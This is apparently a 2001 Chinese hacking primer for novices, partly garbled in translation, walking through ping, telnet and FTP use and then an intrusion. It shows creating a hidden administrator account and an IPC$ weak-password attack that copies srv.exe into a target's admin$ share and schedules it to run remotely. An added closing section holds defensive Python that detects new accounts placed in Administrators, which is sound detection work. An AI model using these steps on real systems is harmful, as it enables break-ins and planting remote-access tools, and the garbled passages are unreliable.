Hellis Novice Entry Brochure
www.sandflee.net 2001-12-15
Gray Trajectory, reposted from China Network Legion!

Dear rookie comrades, Hellis will lead you into the network self-defense counterattack of Baoda Wei Guo.

2) Warm-up exercises

First things first: get familiar with our surroundings.

2.1 Ping

    C:\> ping /?
    Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-I tos] [-r count]
                [-j host-list] | [-k host-list] [-w timeout] destination-list

Several common options:

    -t          Ping continuously without end; press Ctrl+C to terminate.
    -n count    Send count ICMP echo packets.
    -l size     Packet size.
    -i TTL      Time to live. If the number of network nodes between you and
                the target is greater than TTL, you will not reach the target.
    -w timeout  If no response has arrived after timeout milliseconds, ping
                reports that the request timed out.

Example:

    ping -l 250 -w 3500 www.xxx.com -t

The results are roughly these:

(1) The other party responds:
    Reply from xxx.xxx.xxx.xxx: bytes=250 time=110ms TTL=253
(2) No host with this name:
    Unknown host www.xxx.com.
(3) The connection to the host timed out, or the other side's firewall or host is blocking ICMP:
    Request timed out.
(4) The other party is shut down, or a firewall is deceiving you:
    Destination Unreachable.

2.2 Telnet

    C:\> telnet
    Microsoft Telnet> help
    close     Close current connection
    display   Display operating parameters
    open      Connect to a site
    quit      Exit telnet
    set       Set options (type 'set ?' for a list)
    status    Print status information
    unset     Unset options (type 'unset ?' for a list)
    ?/help    Print help information
    Microsoft Telnet> set ?
    Microsoft Telnet> unset ?

Examples:

(1) Turn on local echo:
    Microsoft Telnet> set local_echo
(2) Connect to the target:
    Microsoft Telnet> open 127.0.0.1 18888
    Connecting to 127.0.0.1 ...
    Unable to open a connection to the host on port 18888: the connection failed
    Otherwise you get the other side's screen ~~

2.3 FTP

Manual version:

    C:\> ftp
    ftp> ?
    Commands may be abbreviated. Commands are:

    !            delete       literal      prompt       send
    ?            debug        ls           put          status
    append       dir          mdelete      pwd          trace
    ascii        disconnect   mdir         quit         type
    bell         get          mget         quote        user
    binary       glob         mkdir        recv         verbose
    bye          hash         mls          remotehelp
    cd           help         mput         rename
    close        lcd          open         rmdir

    ftp> open www.xxx.com
    Connected to www.xxx.com.
    220 www.xxx.com FTP Server
    User (www.xxx.com:(none)): <fill in the username you are using; how to find a username comes later>
    Password:
    230 User hellis logged in.
    ftp> bin
    ftp> ls
    ftp> get srv.exe
    ftp> bye

Automated version:

    C:\> echo open www.xxx.com > d
    C:\> echo your user name >> d
    C:\> echo your password >> d
    C:\> echo ls >> d
    !!!!! This checks whether the server establishes the data transfer connection
    C:\> echo bin >> d
    !!!!! This is the option you need for downloading executables
    C:\> echo get <the file you want> >> d
    C:\> ftp -s:d
    Waiting ~~~

2.4 Net

    C:\> net user
    Take a look at this list and remember which users are there.
    C:\> net user test test /add
    C:\> net user
    Take a look again: oh, there is now a user test.
    C:\> net localgroup administrators test /add

Right-click "My Computer" -> Manage -> Local Users and Groups -> Users -> test -> Properties -> Member Of. Wow, it is in the Administrators and Users groups, hahahaha, now I can do whatever I want. We are warmed up; let's start working.

3) Many Baidu

Of course, use Stream IV: "Detection" -> "Advanced Scan Tool" -> fill in the other party's address under "Start Address" -> Start !!! Next time to see the article. ..... !!! View the report !!!

4) Family national envoy, national hate ...

Check the Stream report and pay attention to the following:

(1) IPC weak password: stupidadmin (admin): stupidpass !!! Pay attention to the admin in parentheses, it makes your mouth water !!!
(2) Telnet simple password: less ...
(3) FTP simple password: to make a big place
(4) IIS remote_execute_x: national hatred, report he no problem!
(5) SQL SA account weak password: very useful

IPC weak password attack:

    C:\> net use \\xxx.xxx.xxx.xxx "stupidpass" /user:stupidadmin
    The command completed successfully.
    C:\> net view \\xxx.xxx.xxx.xxx
    See the other party's share list.
    C:\> cd <Stream installation directory>\Tools
    <Stream installation directory>\Tools> copy srv.exe \\xxx.xxx.xxx.xxx\admin$\system32\
    Wait, wait ....
    1 file copied.
    !!! Great !!!
    <Stream installation directory>\Tools> at \\xxx.xxx.xxx.xxx
    The list is empty.
    !!! No tasks? I will add one for you ~~~ hehe

If it reports an error saying the service is not running, do this:

    <Stream installation directory>\Tools> netsvc.exe schedule \\xxx.xxx.xxx.xxx /start
    The service started successfully.
    !!! Yeah, it just takes a long wait; I have patience ~~~
    <Stream installation directory>\Tools> net time \\xxx.xxx.xxx.xxx
    The current time at \\xxx.xxx.xxx.xxx is 2001/12/13 PM 05:34
    The command completed successfully.
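
The two account commands in section 2.4 (net user test test /add, then net localgroup administrators test /add) each leave a record in the Windows Security log, and the pair arriving close together is what a defender looks for. The following is an added example, not part of the original article: it correlates event 4720 (account created) with event 4732 (member added to a local group) on the Administrators SID. Those event IDs and field names come from current Windows versions, which this 2001 text predates; the dict layout, function name and sample events are constructed for illustration.

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group
ACCOUNT_CREATED = 4720               # "A user account was created"
ADDED_TO_LOCAL_GROUP = 4732          # "A member was added to a security-enabled local group"


def find_new_admin_accounts(events, window=timedelta(minutes=10)):
    """Flag accounts that were created and then put into Administrators within `window`."""
    created = {}  # SID of a new account -> its 4720 event
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == ACCOUNT_CREATED:
            created[ev["TargetSid"]] = ev
        elif ev["id"] == ADDED_TO_LOCAL_GROUP and ev["TargetSid"] == ADMINISTRATORS_SID:
            # In 4732, TargetSid is the group and MemberSid is the account being added.
            birth = created.get(ev["MemberSid"])
            if birth and ev["time"] - birth["time"] <= window:
                alerts.append({
                    "account": birth["TargetUserName"],
                    "created_by": birth["SubjectUserName"],
                    "promoted_by": ev["SubjectUserName"],
                    "seconds_to_admin": int((ev["time"] - birth["time"]).total_seconds()),
                })
    return alerts


# Constructed sample events (not real log data); SIDs, names and times are made up.
T0 = datetime(2024, 1, 15, 17, 30, 0)
SAMPLE_EVENTS = [
    {"id": 4720, "time": T0, "TargetUserName": "test",
     "TargetSid": "S-1-5-21-1-2-3-1005", "SubjectUserName": "stupidadmin"},
    {"id": 4732, "time": T0 + timedelta(seconds=40), "TargetSid": ADMINISTRATORS_SID,
     "MemberSid": "S-1-5-21-1-2-3-1005", "SubjectUserName": "stupidadmin"},
    # New account that only lands in Users (S-1-5-32-545): not flagged.
    {"id": 4720, "time": T0 + timedelta(minutes=1), "TargetUserName": "intern",
     "TargetSid": "S-1-5-21-1-2-3-1006", "SubjectUserName": "helpdesk"},
    {"id": 4732, "time": T0 + timedelta(minutes=2), "TargetSid": "S-1-5-32-545",
     "MemberSid": "S-1-5-21-1-2-3-1006", "SubjectUserName": "helpdesk"},
    # Account created a day before it is promoted: outside the window, not flagged.
    {"id": 4720, "time": T0 - timedelta(days=1), "TargetUserName": "ops",
     "TargetSid": "S-1-5-21-1-2-3-1004", "SubjectUserName": "helpdesk"},
    {"id": 4732, "time": T0 + timedelta(minutes=3), "TargetSid": ADMINISTRATORS_SID,
     "MemberSid": "S-1-5-21-1-2-3-1004", "SubjectUserName": "helpdesk"},
]

if __name__ == "__main__":
    for alert in find_new_admin_accounts(SAMPLE_EVENTS):
        print(alert)
```

Matching on the group SID rather than the group name keeps the check working on systems where the Administrators group has a localized name.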